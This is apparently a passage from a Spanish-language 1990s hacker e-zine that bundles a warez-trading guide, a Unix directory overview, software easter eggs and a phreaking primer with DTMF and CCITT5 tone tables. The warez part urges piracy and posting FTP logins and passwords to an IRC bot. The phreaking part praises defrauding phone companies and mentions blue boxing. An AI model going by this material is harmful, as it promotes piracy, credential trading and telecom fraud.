pillas la lista y quedate un rato y tal chatea mira los anuncios de web's y eso. Quieres calidad de listas ? Pues segun lo que he visto en mejor canal de warez qye he visto es #wareztalk de efnet o en warez_talk de undernet tiene sucursales XDDDD pues hay no te dan las listas por la cara tienes que postear un site osea un FTP. Eso que es?? Pues en el topic del canal o el bot te dira o te mostrara en el canal. To get the largest *VERI FIED* list of sitez compiled from the Undernet, Efnet and NewNet, POST a site to me, Sitez98, by typing: /msg Sitez98 POST ##. ###.##.### /warezpath l:ogin p:assword. We now accept MP3 Sites as: /msg Sitez98 MP3 ##.###.##.### /mp3path l:ogin p:assword Si es de warez el site que posteas pues pones POST si es de M P3 pues MP3 luego pones el la ip del ftp en numeros no accep tan letras luego el directorio el l/P si es anonimo lo tienes que decir pones L:anonymus P:Lamer@aol.com . TOP SECRET Pero Que Pasa si quieres un site permanente una cuenta privada en uno de ellos osea un distro personal donde tener lo ultimo en warez?¿?¿?¿? Pues aqui tieenees el SECRETO!!!!! 1) Primero saber utilizar el fxp, lo podreis encontrar en las siguientes web's: powr.islatortuga.com !!! Con un manual del FXP!! 2) Encontrar un sitio que te guste osea un ftp que hayas visto cosas que te molen. 3) Subir de los sites temporales al ftp que te gusta a lo bestia , UTILZANDO EL FXPEO. 4) Crear en el directorio del ftp que te gusta un directorio con tu nick y dejar hay las cosas. 5) Seguir llenando el ftp que te guste hasta que te cansas hasta que lo llenes ;) Una cosa el fxpeo no te reduce ancho de banda. 6) Llegara un momento que el sys op del FTP el dueño y tal dira quien coño es eeste , joder me llena el FTP me lo llena y casi no baja. 7) Luego de haberle llenado el ftp o haber dejado muchas cosas sobretodo no dejes mierda mira haber que le falta o fijate en los directorios que pone plz tal programa o date un rulo por el ftp y mira que tiene el y que le puedes poner tu que mole si dudas pon lo que te salga de los huevos. 8) Dentro del directorio de los uploads el que has creado con tu nick crea un directorio diciendo " soy fulanito de tal (nick) y me gustaria tener una cuenta en tu sitio" le dejas el E-mail y tal o puedes dejarle un leemee.txt diciendo los mismo o un txt con el nombre que te salga de los huevos Pero en INGLES. o en algunos ftp's al entrar te pone E-MAil del sysop , le puedes enviar un mail diciendole lo mismo 9) Ten por seguro que es una inversion el SECRETO esta en no pillar si no dejar durante un tiempo y ten por seguro quee el sysop te dara una cuenta en el ftp. Mira tu que lees en estos momentos por lo que veo la peña solo gorrea y no deja eso trae unas consecuencias que la gente tenga menos ganas de abrir su ftp y tal ... Ademas eso de solo pillar y no dejar es de lamer's eso. Ok Pero a mi no me sale de los huevos acerte caso !!!! pues solo te pido que si teee pillas por ejemplo 5 mp3 que dejes uno que no te cuesta nada , HAZLO PLZZZ aunque solo se ha por AM OR AL WAREZ. Por cierto, no se gente pero mucho warez USA y poco warez spain no se si captas melon, por ejemplo el frontpage 98 = joder esta en todos lados en ingles pero en castellano ufff se pueden contar con los dedos de las manos , Captas PROBLEMA INMENSO !!!! HABER si de una puta vez hay ftp's warez con soft en castellano , oye pero tu el que lee's , hostia estudias en una universidad y tal ... que tal si hablas con el root de tu uni y le dices capukko atento !! ahora mismo habra el FTP y tal ... y me dejas meter software en spain que quiero abrir una FTP warez y estar a la onda ok? captas !!! Nota decirselo con tacto .jejejejej By Sergii Este txt no hubiera sido posible si no fuera por BOSS y FreaKs. Muchas Gracias a los dos y Saludos. I TU EL QUE LEES RECUERDA AMA Al Warez y te sera propicio XDDDD ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -.-.-.-.-.-.-.-.-.-.-.-.-.-.- - UNIX: Sistema de archivos - -.-.-.-.-.-.-.-.-.-.-.-.-.-.- Los directorios por defecto de cualquier sistema Unix son los siguientes: ______________ | / (root) | ___|______________| ____/ ____/ _/ / | \ \ ___/ ____/ __/ / | \ \__ ___/ ___/ __/ / | \ \__ ____/ ___/ __/ / | \ \__ ____/ ___/ __/ | | | \__ ____/ ___/ __/ / | \ \__ ____|_ __|___ ___|_ ___|_ ___|_ __|__ ___|___ | mail | | sbin | | usr | | dev | | var | | etc | | home | |______| |______| _|_____| |_____| |_____| |_____| |______| __/ / | \ \__ _/ / | __/ / | | \_ _/ | | __/ / | \ \__ _/ / \ _/ | | | \_ _/ | | __/ / | \ \_ _/ | | ____|_ ___|_ ___|_ _|___ _|_____ _____|_ ____|__ _|___ | sbin | | bin | | lib | | man | | spool | | user1 | | user2 | | ... | |______| |_____| |_____| |_____| |_______| |_______| |_______| |_____| Y ahora una breve descripcion: / Comienza el sistema de archivos. Se conoce como directorio raiz. /home Contiene los directorios propios de los usuarios (en este caso solamente habrian dos usuarios - user1 y user2). /mail Contiene los directorios de correo de los usuarios. /bin Contiene todas las ordenes estandar y los programas de utili- dad. /usr Contiene los archivos y ordenes usados por el sistema. Este directorio se compone de varios subdirectorios: /bin Contiene las ordenes orientadas a los usuarios y los programas de utilidad. /sbin Contiene las ordenes de administracion del sistema. /lib Contiene las bibliotecas de los lenguajes de programacion. /doc Contiene documentacion de Unix. /man Contiene los archivos del manual interactivo 'man'. /spool Contiene archivos en formato spool, tales como los que se ge- neran para imprimir tareas y hacer transferencia en redes. /sbin Contiene ordenes de administracion para arrancar el sistema. /var Contiene archivos 'variables' (que pueden varias) como los ar- chivos 'mailbox' (buzon). /dev Contiene interfaces de archivo para dispositivos tales como el terminal y la impresora. /etc Contiene archivos de configuracion del sistema y cualquier o- tro archivo de sistema. Si ya estas familiarizado con el sistema Unix habras observado que el directo- rio /etc es uno de los mas importantes dado el papel que juega en el sistema. Como ya he dicho antes, contiene todos los archivos de configuracion del sis- tema, por lo que si alguien tuviera acceso de escritura podria causar un caos. Bueno, eso de tener acceso de escritura lo dejo en vuestras manos. Yo simple- mente os voy a detallar para que sirven los ficheros mas importantes: /etc/inittab Establece el estado por defecto asi como las conexiones de los terminales. /etc/passwd Contiene las configuraciones de las contraseñas y de entradas de usuario (naturalmente, encriptados). /etc/shadow A veces, la contraseña del fichero anterior se encuentra aqui. Para una mayor seguridad del sistema. /etc/group Contiene una lista de grupos con las configuraciones de cada uno. /etc/fstab Monta automanticamente los sistemas de archivos cuando inicia el sistema (te evita el hacer los 'mount' manualmente). /etc/printcap Contiene una lista de cada una de las impresoras y de sus res- pectivas especificaciones. /etc/termcap Contiene una lista de las especificaciones de los tipos de terminales que peden ser conectados al sistema. /etc/gettydefs Contiene informacion de la configuracion de los terminales que estan conectados al sistema. /etc/skel Es el directorio que contiene las distintas versiones de los archivos de inicializacion, tales como '.bash_profile' que son copiados en los directorios propios de los nuevos usuarios. /etc/shell Contiene los shell de usuario, tales como BASH o TCSH. /etc/ttys Presenta una lista de los dispositivos de terminales y de los dispositivos de terminales con los cuales se corresponden. Archivos de inicializacion del sistema: /etc/rc.d Directorio que contiene los archivos de inicio y cie- rre del sistema. /etc/rc.d/rc.sysinit Archivo de inicializacion del sistema. /etc/rc.d/rc.local Archivo de inicializacion de sus propias ordenes. Pue- des editar libremente este archivo para añadir tus propias ordenes de inicio. Es el ultimo archivo de i- inicio que es ejecutado. /etc/rc.d/init.d Directorio que contiene muchos de los archivos de ini- cializacion que sirven para iniciar y cerrar varios programas demonio (daemon). /etc/rc-d/init.d/halt Indica las operaciones que se han de realizar cada vez que cierra el sistema, tal y como desmontar sistemas de archivo. Tambien se puede ver como 'rc.halt'. /etc/rc-d/init.d/ lpd.init Iniciar y cerrar el programa demonio 'lpd'. /etc/rc-d/init.d/inet Inicia las operaciones para establecer las interfaces de redes y el programa demonio 'inet' Llama al archi- vo 'networks'. /etc/rc-d/init.d/ httpd.init Inicia las operaciones para iniciar y cerrar el pro- programa demonio servidor de Web, 'httpd'. /etc/rc-d/init.d/ cfs.init Indica las operaciones para iniciar y cerrar el servi- dor. /etc/rc-d/init.d/ipx Indica las operaciones para iniciar y cerrar el pro- grama demonio servidor de IPX de NetWare. ·-= GuyBrush =-· ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   \  /   Por: Cytorax \ « EASTER EGGS » / Cytorax@BigFoot.com   \  /    http://members.xoom.com/cytorax/index.html   http://members.tripod.com/~cytorax/index.html    INTRO Gracias a la oportunidad que me dieron de escribir en esta revista, aqui me presento soy Cytorax y espero que este articulo les agrade ya que es la primer vez que soy escribo para una revista pero en fin.  EASTER EGGS (HUEVOS DE PASCUA) Un Easter Egg es un secreto o fucion de un programa diseñado para divertir. El uso mas popular que le dan al Easter Egg los programadores es para esconder sus nombres dentro de la aplicacion, provocando a todos nosotros el hacer cosas extrañas para descubrirlos. Dicen por ahi que los iniciadores de todo esto fueron los programadores de Atari, despues los de Microsucks siguieron con todo esto.  PROGRAMAS CON EASTER EGGS Dentro de los programas que conocemos los Easter Eggs se encuentran mas comunmente en los de Microsucks y otros pocos en algnos otros programas, a continuacion les hago un listado con los programas en los cuales puedes encontrar Easter Eggs. -Acces -Word -Excel -Power Point -Windows 95 -Netscape -ACDSee -After Dark -Ami Pro -C++ Builder -Corel Draw -Delphi -Eudora -FrontPage 97 -Illustrator -Lotus Notes -Microsoft Chat -Internet Explorer -Netscape Communicator -MIRC -Quick Time 32 for Windows -Photoshop -Turbo Pascal -Windows 31 -Windows NT -Windows Wine -Y otros mas........................  AHORA SI, LOS EASTER EGGS (CON EXPLICACION DETALLADA) Creo que ya estan desesperados por conocer algunos de los Easter Eggs asi que empezemos de una vez, a continuacion esta escrito arriba los nombres de los programas con mayusculas y cada paso esta indicado por un numero, facil ¿NO?, bueno adelante. (((Access))) 1.- Crea una nueva tabla llamada "cirrus" (sin las comillas). 2.- Selecciona Help / About. 3.- Manten presionado [Ctrl]+[Shift] y da doble click en el logo con el boton derecho del mouse para ver una animacion con los creditos. 1.- Crea cuatro nuevas tablas llamadas "a", "cc", "e", "ss" (sin las comillas). 2.- Selecciona Help / About. 3.- Manten presionado [Ctrl]+[Shift] y da doble click en el logo con el boton derecho del mouse para ver un rompecabezas. 1.- Selecciona Tools / Security / User and Group Accounts. 2.- Da click en "New User". 3.- En el campo User Name, teclea "Pioneer" (sin las comillas). 4.- En el campo Personal ID, teclea "092595" (sin las comillas). 5.- Da click en OK para ver los creditos. ______________________________________________________________________________ (((ACDSee))) Tamaño 1.- Presiona "*" en el Teclado Numerico mientras estas viendo la imagen que aparecera in el pantalla. Scrolling 1.- Manten presionado Ctrl mientras usando las flechas del teclado mueves una imagen. Con Shift se mueve lento. Show De Diapositivas 1.- Para empezar, deten y resume las diapositivas, pressiona Ctrl and s. Todas las imagenes del directorio estaran incluidas en la presentacion. ______________________________________________________________________________ (((After Dark))) 1.- Selecciona el Modulo "Messages 4.0" 2.- Acomoda a tu gusto el mensaje y escribe: "~" (tilde, sin las comillas). 3.- Activa el protector de pantalla para ver a una mano dibujar una cara. ______________________________________________________________________________ (((Ami Pro))) 1.- Selecciona Help / About. 2.- Manten presionado [Ctrl]+[Alt]+[Shift]. 3.- Presiona [F7], luego S, P, A, y M. 4.- Teclea el ultimo digito de lo que dice en Available Memory, seguido por el tercer al ultimo digito para ver fotos de los programadores. ______________________________________________________________________________ (((C++ Builder))) 1.- Selecciona Help / About. 2.- Manten presionado [Alt] y presiona "T" o "D" (sin las comillas) para ver los creditos. ______________________________________________________________________________ (((Corel Draw))) 1.- Desde el menu de ayuda, selecciona About. Da doble click sobre uno de los iconos. Ahora tu podras ver un globo de Corel y una mano con una palanca. Da click con el boton derecho y mantenlo. El globo ascendera. Si das otro click veras algo divertido y asi consecutivamente cada vez que des click en horas diferentes y dias tambien. ______________________________________________________________________________ (((Delphi))) 1.- Selecciona Help / About. 2.- Manten presionado [Alt] y teclea "TEAM" (sin las comillas) para ver los creditos. ______________________________________________________________________________ (((Excel))) 1.- En una nueva hoja, muevete a la celda B95. 2.- Selecciona Help / About. 3.- Manten presionado [Alt] y [Shift], luego da click en "Troubleshooting" para entrar a The Hall Of Tortured Souls. 4.- Teclea "excelkfa" para abrir un area secreta. 1.- En una nueva hoja, presiona F5 para saltar a una celda. 2.- Teclea X97:L97 y da click en OK. 3.- Presiona [Tab]. 4.- Y luego manten presionado [Ctrl]+[Shift] y da click en Chart Wizard que esta en la barra de herramientas. ______________________________________________________________________________ (((Eudora))) 1.- Ve a Help y About Eudora... 2.- Luego selecciona More Credits. 3.- Manten presionado Ctrl para algo divertido. ______________________________________________________________________________ (((FrontPage 97))) 1.- Arranca FrontPage Explorer. 2.- Manten presionado Shift mientras seleccionas Help y About 3 veces. 3.- Da click en OK las primeras 2 veces. ______________________________________________________________________________ (((Illustrator))) 1.- Al fondo de la pantalla, hay un menu que te muestra la herramienta, fecha y hora, memorya libre y numero de undos. 2.- Manten presionado Alt mientras das click en el para ver dias festivos. ______________________________________________________________________________ (((Lotus Notes))) Version 4.0: 1.- Selecciona Help y About Notes. Teclea "elvis is not dead", todo en minusculas. La cabeza de Ray Ozzie's saldra y mostrara los creditos. Version 4.5: 1.- Selecciona Help y About Notes. Teclea "yes he is", en minusculas. Y la cabeza de Ray Ozzie's saldra y mostrara los creditos. ______________________________________________________________________________ (((Microsoft Chat))) 1.- Teclea "CanThereBMore?" (Nopresiones Enter). 2.- Manten presionado Ctrl y Shift y presiona en el boton de Open Favorites, o selecciona Open Favorites... desde el Favorites drop-down menu. Ahora tu podras observar la caricatura de los caracteres bailar! ______________________________________________________________________________ (((Microsoft Internet Explorer))) 1.- Desde el Help menu, escoje "About Internet Explorer". 2.- Presiona Ctrl y da click en la "e" azul, y arrastralo (mientras mantienes presionado Ctrl) a lo largo de la linea el globo y luego tomara el texto "Internet Explorer" hacia la derecha. Un boton que dice "Unlock" sera revelado da click en el. 3.- Finalmente presiona Ctrl y da click y mueve la "e" dentro del globo de nuevo. 1.- Teclea "about:mozilla" (recuerdas Netscape). ______________________________________________________________________________ (((MIRC))) 1.- Ve a la ventana del mIRC (help - about). Da click con el boton izquierdo del mouse en la nariz de Khaled para oir un sonido. ______________________________________________________________________________ (((Netscape Communicator))) 1.- Primero ve al menu "Edit" y "Preferences". 2.- Abajo de la etiqueta del Navegador, da click en "Clear History". 3.- Salte de Netscape. en tu directorio de Netscape, encontraras un archivo llamado prefs.js. 4.- Abrelo en un editor de texto. Mira cuidadosamente, y encontraras varias lineas de "user_pref("browser.url_history.URL_2", "www.sharepaper.com");". 5.- Borra estas lineas. Y eso es todo. 1.- En el campo de URL, teclea: about:cache - Muestra todos los archivos del cache. about:global - Muestra todos los lugares que has visitado. about:image-cache - Muestra todos los archivos imagen del cache. about:justanytext - Muestra cualquier texto en el navegador. about:memory-cache - Muestra todos los archivos en la memoria del cache. 1.- mozilla, marca, ari, atotic, blythe, chouck, dmose, dp, ebina, hagan, jeff, jg, jsw, jwz, karlton, kipp, mlm, montulli, mtoy, paquin, robm, sharoni, terry, and timm. 1.- Ctrl Alt f - Te lleva a Amazing Fish Cam! Ctrl Alt s - Esconde la status bar. Ctrl Alt t - Muestra un reporte de los URLs ______________________________________________________________________________ (((Photoshop))) 1.- Manten presionado [Alt]. 2.- Selecciona Help / About para ver una foto de "Big Electric Cat". 1.- Antes de comenzar Photoshop, manten presionado [Alt]. 2.- Arranca Photoshop para ver la foto de "Big Electric Cat" en la portada del Photoshop. ______________________________________________________________________________ (((PowerPoint))) 1.- Selecciona Help / About. 2.- Mante presionado [Ctrl]+[Shift] y da click en el logo de PowerPoint para ver los creditos con fuegos artificiales. 1.- Selecciona Help / About. Da click en el icono de PowerPoint. Y apareceran los creditos. ______________________________________________________________________________ (((Quick Time 32 for Windows))) 1.- Abre QuickTime 32. 2.- Da click el logo de QuickTime, y una caja aparecera. 3.- Da click con el boton derecho del mouse en el logo y veras una imagen de los programadores. ______________________________________________________________________________ (((Turbo Pascal))) 1.- En el IDE, selecciona Help / About. 2.- Manten presionado [Alt] y presiona [I] para ver los creditos. ______________________________________________________________________________ (((Windows 3.1))) 1.- Ve al Administrador de Programas. 2.- Manten presionado [Ctrl]+[Alt]+[Shift] y selecciona Help / About. 3.- Da doble click en el logo de Windows con el boton izquierdo del mouse. 4.- Da click en OK. 5.- Repite los pasos 2-4 para ver una animacion de una bandera de Windows y varios miembros del grupo de programadores. ______________________________________________________________________________ (((Windows 95))) 1.- Crea una nueva carpeta en el Escritorio. 2.- Renombra a la carpeta con "and now, the moment you've all been waiting for" (sin las comillas en todos los pasos). 3.- Renombra a la carpeta con "we proudly present for your viewing pleasure". 4.- Renombra a la carpeta con "The Microsoft Windows 95 Product Team!". 5.- Abre la carpeta para ver los creditos animados con sonidos. 1.- Da click en el boton de Inicio. 2.- Presiona [Alt]+[-] para ver las opciones del boton (lo puedes mover y cerrar). ______________________________________________________________________________ (((Windows NT))) 1.- Selecciona 3D Text como screen saver. 2.- Cambia el texto a lo siguiente: beer Beers. I like NT Developers and testers, or message "Good". I love NT Developers and testers, or message "Good". not evil Developers and testers. rock Bands. volcano Volcano names. ______________________________________________________________________________ (((Windows Wine))) 1.- Arranca la guia Wine. 2.- Manten presionado Ctrl y Shift mientras tecleas "redmond". Desde el menu de Help, selecciona About Wine Guide. 3.- Da doble click en el bote de wine. El corcho saltara. 4.- Da doble click en el corcho y una ventana se abrira, mostrando fotos de Bill Gates sin su playera en un picnic con su compañia y escucharas la cancion de Pretty Woman. ______________________________________________________________________________ (((Word))) 1.- Activa el Caps Lock. 2.- Selecciona Format / Define Styles / Options. 3.- Selecciona "Normal" en la caja "Based On". 4.- Presiona OK. 5.- Da click en Cancel. 6.- Selecciona Help / About. 7.- Presiona O, P, U, y S en el teclado al mismo tiempo mientras el mouse esta en blanco para ver los creditos con fuegos artificiales. 1.- Selecciona Tools / Macro. 2.- Teclea "spiff" como nombre del macro. 3.- Borra todas las lineas del macro. 4.- Selecciona File / Close y cuando pregunte que salvar los cambios, selecciona "Yes". Luego selecciona Help / About. 5.- Da click en el logo de Word y ve una historia. 1.- En un nuevo documento, teclea "T3!" (sin las comillas) en negritas. 2.- Selecciona Format / AutoFormat y da click en OK, luego Accept. 3.- Selecciona Help / About. 4.- Da click en el logo de Word para ver los creditos. 1.- Teclea "zzzz" (sin las comillas) en un documento. 2.- Selecciona las "zzzz". 3.- Corre el corrector ortografico para ver un sugerencia extraña. 1.- Teclea en un nuevo documento "Credits://where's.karen's.brother?" (sin las comillas) 2.- Selecciona Help / About. 3.- Da click en el dibujo para ver los creditos. 1.- En un nuevo documento teclea "Blue" (sin las comillas), luego seleccionalo. 2.- Pon en negritas el texto y cambialo a color azul. 3.- Pon un espacio despues de la palabra "Blue". 4.- Selecciona Help / About. 5.- Manten presionado [Ctrl]+[Shift] y da click en el logo de Word para entrar en un juego de pinball. 1.- Ve a Help / About. 2.- Manten presionado Ctrl y Shift izquierdo, mientras das click en el icono de Word. 3.- Ahora, podras ver los creditos. ______________________________________________________________________________  DESPEDIDA Ya terminado mi articulo solo me queda despedirme de los lectores de esta revista, gracias por su atencion y recuerden cualquier duda o comentario escriban contestare con mucho gusto y tambien si tienen un Easter Egg que no mencione. Ha y recuerden "VIVAN LA VIDA".  MI LLAVE PGP Si desconfian de las comunicaciones que tenemos aqui les dejo mi llave PGP por si las dudas. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ Tipo Bits/Clave Fecha Identificador pub 1024/2D23674D 1997/12/03 Cytorax <Cytorax@bigfoot.com> -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0 e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD 95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s =Xw7I -----END PGP PUBLIC KEY BLOCK----- ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ │ Antes de ser Phreaker │ │ por El Emperador │ Saludos a todos, cultura rasta. Drogas para sentirse bien, no para ser mas violentos, eso es gueno, no pensar en uno mismo, pensar tambien en los demas, principalmente en los desafortunados. Quiero parlar un rato de phreaking, asi que si en algun momento no te gusta lo que digo, deja de leer lo que escribo. [aunque lo escribo de onda] Que es phreaking?, es una forma de cagar a las putas empresas multinacionales extranjeras de telefono, para vengar, en menor medida, al pueblo que RESISTE!. Logrando una forma mas 'formal' la definicion es "utilizacion de telefonos para la experimentacion y el conocimiento". Algunos lo usan o usaron para beneficios economicos personales, otros no. Es algo complicado empezar por algo, que se yo, el tema es groso. Entre dos clientes, Diego y Armando hay muchos artefactos que intermedian. Diego quiere llamar por telefono a Armando, que vive en la misma ciudad, pero a muchas cuadras de distancia. Lo separan cajas de distribucion, filtros, las "centrales origen/destino"... Al levantar el tubo, por la linea de telefono (que en ese momento estaba en 48v) pasan 10v. La central origen espera que el origen, Diego, marque en su telefono el numero de Armando, destino. Diego puede marcar por tono o por pulso. Si tiene el viejo telefono a disco, entonces solo puede llamar por pulso, y si tiene el de tono, puede marcar por tono o por pulso, segun el telefono este seteado (SISISI!!!, esa palanquita atras, al lado del volumen). Esperen que quiero ver hasta donde crecio la Juana.... una hojita menos..... sssssssssssss.....satisfaction ≡|-> Listo fieras!!!!. quede ahi, bueno. decia que por tono puede marcar y la central no capta mas que sonidos y beepes de determinadas frecuencias y duracion. Cada teklita del telephono al apretarla manda 2 frecuencias, las clasicas denominadas DTMF (Dual Tone Multi Frequency). La tabla DTMF HZ 1209 1336 1477 1633 697 1 2 3 A 770 4 5 6 B 852 7 8 9 C 941 * 0 # D ej. Si apretas el uno manda primero una frecuencia de 1209 hz y despues 697 hz a la central origen (tu central). i.e If you press the number one this send first a freq of 1209 hz and after 697 hz to the origin central (your central). Entre centrales hay determinados tipos de señalizacion. Entre centrales de Argentina se usa CCITT7 o SS#7. [por tal motivo me olvide de la black box]. Entre centrales de Argentina y Chile se usa la ccitt5, por lo cual se puede hacer blue boxing ;) Otra tablita, la de ccitt5, gentileza de Cut and Past 700 : 1 : 2 : 4 : 7 : 11 : 900 : : 3 : 5 : 8 : 12 : 1100 : : : 6 : 9 : KP : 1300 : : : : 10 : KP2 : 1500 : : : : : ST : : 900 : 1100 : 1300 : 1500 : 1700 : Entre centrales extranjeras se usa la ccitt5. Antes en Estados Unidos entre las centrales locales se usaba ccitt5, con lo que para hacer blue boxing solo se pagaba llamada local, porque no era muy "comun" que existan 800's. Ahora los hay por doquier (por todos lados). En otros paises tambien se usaba, ahora, la verdad, no se, si ustedes saben me chiflan. [el-emperador@mailcity.com] Bueno, rapidamente la informacion (datos procesados) llega a la central destino, esta la convierte para que el telefono de Armando la pueda interpretar y el telefono de Armando suena (RING!!!!). Armando levanta el tubo, pregunta quien es el que esta del otro lado y empieza a hablar con Diego. [cuando paso a buscar el papelito?] Despues Armando corta, pero hasta que Diego, o sea, origen, no corte, la comunicacion no ha terminado. Hay algunas centrales en las que la comunicacion se termina cuando cualquiera de los dos corta (0800). Cada numero de abonado se divide en 2 partes. XX-XXXX Ejemplo 8 0 - 2 5 5 7 Los 2 primeros numeros (8y0) es para describir la central, la identificacion de la central a la que esta conectado el abonado. Los 4 siguientes numeros (2,5,5y7) son el numero del abonado, la direccion telefonica. En algunos lugares superpoblados (como Buenos Aires) el numero de central son 3 y no 2 como en Rosario u otras ciudades sin tantos habitantes (*). Ej. 766-2557 { !!!NUMERO INEXISTENTE!!! } Si se desea identificarlo desde otro lugar del planeta, se usan los numeros de Codigo de Pais, Codigo de Area o Ciudad y el de Central y el de abonado. Si se quisiera llamar desde China a Rosario, la "direccion telefonica" del 81-9188 seria: +54 (041) 81-9188. Donde +54 es el codigo de pais (en este caso Argentina) 041 el de area (en este caso ciudad de Rosario) y el resto ya lo explique antes. Bueno, tendria que explicar las conexiones de los telefonos ? Tu telefono se conecta a una cajita dentro de tu casa, esa cajita habia recibido desde afuera un cable con la linea de telefono. La linea de telefono proviene de una caja de distribucion, y esta caja de distribucion se conecta a una interfaz del area, que puede estar a 1/2 cuadra de la caja de distribucion o a mas, 2, 3, 4... Ahi van a parar las conecciones de varias cajas de distribucion. De esta interfaz de area de servicio va a la oficina central del area. De la oficina central del area va a un centro de llamadas que la manda a la central del area destino. De la destino va a la interfaz destino, de esta a la caja de dist. destino y de aca al abonado destino (Armando). Esquematicamente llamado de Diego a Armando. |Diego|--1---2----3------------4------------5-------6----7---8--|Armando| 1------> Caja de distribucion de Diego 2------> Interfaz del area 3------> Oficina del area de Diego 4------> Centro de llamadas 5------> Central que intermedia entre 3 y la oficina del area de Diego (**) 6------> Oficina del area de Armando 7------> Interfaz del area 8------> Caja de distribucion de Armando * A partir del 99 los numeros de telefono en Argentina tendran un digito mas, para el caso de Rosario, el 81-9188 pasara a ser 481-9188. Esperemos que Menem no aumente el monopolio de la empresa de telefono. **Esta central es segun el lugar; en algunos lugares hacen de intermediarios entre la central y otra oficina. En otras no existe. Ahora es tiempo de que sepan brevemente algo de como se transmite la señalizacion. Por CORRIENTE CONTINUA, el estado de la señal indica colgado, descolgado, pulsos de discado o estado de la interconexion. Se usa generalmente entre centrales analogicas. Con TONOS, la misma palabra lo dice, se usan tonos para saber el estado o para indicarlo. TONO FRECUENCIA TIEMPO DE TIEMPO DE hz ACTIVADO seg DESACTIVADO seg Discado 350 + 440 continuo --- Ocupado 480 + 620 0.5 0.5 Ring (normal) 440 + 480 2 4 Ring (pbx) 440 + 480 1 3 Numero inexistente 200 a 400 continuo modulado en freq con 1 hz. Re-Call 480 + 620 0.3 0.2 Congestion (Tel. Publico) 480 + 620 0.2 0.3 Receptor Descolgado 1400 + 2060 + 0.1 0.1 2450 + 2600 Con esos tonos la central informa al origen el estado de la llamada, por ejemplo para informar que esta ocupado la central manda combinaciones de frecuencias (un tono) 480 y 620 hz en rafagas de 0.5 segundos separados por intervalos de 0.5 segundos. La de discado, es un tono continuo de frecuencias 350 y 440 hz. En los dos tipos de señalizacion anteriores se envian las señales de control y de direccionamiento por el mismo circuito que las señales de voz. En la señalizacion de CANAL COMUN ENTRE OFICINAS las señales de control son enviadas por un circuito donde se detecta y se efectua la conmutacion y el control de lineas independientemente de las señalez de voz. Hasta aca llega el consuelo de mi locura, espero que todas las guerrillas informaticas de America Latina hagan algo para poder decir, si, fuimos nosotros, si, somos latinos, si, somos poderosos, a pesar que nuestros gobiernos y los de los paises poderosos dicen que no. N0S0TR0S S0M0S P0DER0S0S DE ALMA, N0 DE B0LSILL0$$$$$$$$ Desde Rosario, Cuna de La Bandera y del Che.// El Emperador.// Internet e-mail: el-emperador@mailcity.com Fidonet Netmail: 4:904/104.11 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.0i for non-commercial use mQGiBDVv63ARBADCimbkn1BpEAjSJzDsEVD8U14i1H+HBcWU3mTYmA3AgCvGrjXJ q+ST6gT4LGichoe9S7iwShhw6vG6QBSCQNSxVhu7bHe77BsIRSfXbvHww+U2UK8X o4pA7CAuHVToX7VgQxfw7NlOynqhJf/G5BGtRLuOYFMQITl3BcCquGX3hwCg/7oo q+N7apJK5Q96xlYM2o4ep08D/2Dmghl+JDOr5lzSCgjV9tauKXMUmn2spGTbxZSN j/VA/O2quvpzjnLMSMf2vGMJirjGa5hO91j7+rWN2CGWm0MazZ0eiMpO5fLOAATn 1Yc+VPZRD0tIrWiawSefkA37LLefcyV8DNaHgcBsB9KbneUF7MNIspWlYHLjYrKJ h1JSA/0S4O+jp90kMQviQE9PZSeCisynp+mZ60YBgl+AQ5YqbQXsOPX6w5pPQIpC 4+bymHr2toYp6Kk2V+gwBOgYvJGw74olxoaDYJteTYZ1WhNb0mLetpWI1byuWO0T hGZvy+hrt2ZwnR3SsO/Ogm5SHIiD4ns+DRol9UfD2gYD7fwwULQMRWwtRW1wZXJh ZG9yiQBLBBARAgALBQI1b+twBAsDAQIACgkQCemQI95I0b5jZgCbBXe2RGRGmjYK BlGn0sLkXLaPjYUAoOyazfM5e7Rhtn5QztQEJ/5ooXG4uQENBDVv7HQQBADmmDRZ wYrhQXLwZIAMAiD7awuZbeuIqN5imHWkQ38ApANurj888nXekWgV7mtKSUGWj+Yv jBLCKVGYW2DVBH1KFOES/1pYf3SJ7OM/FCK+gE0P7cajlKAbiqANKThbSC3vEf9z GrMvU2+LwyEmm59G5b3o1jWMoPd98oHISbE64wACAgQAs1nY2BBIH/kOVZc8vdEZ IaY4e3bu6f2aQ3zdd/sIPzDS7kre77xE82Wfx+59cxu6M0mWfVx+7tVujD2iWuFt 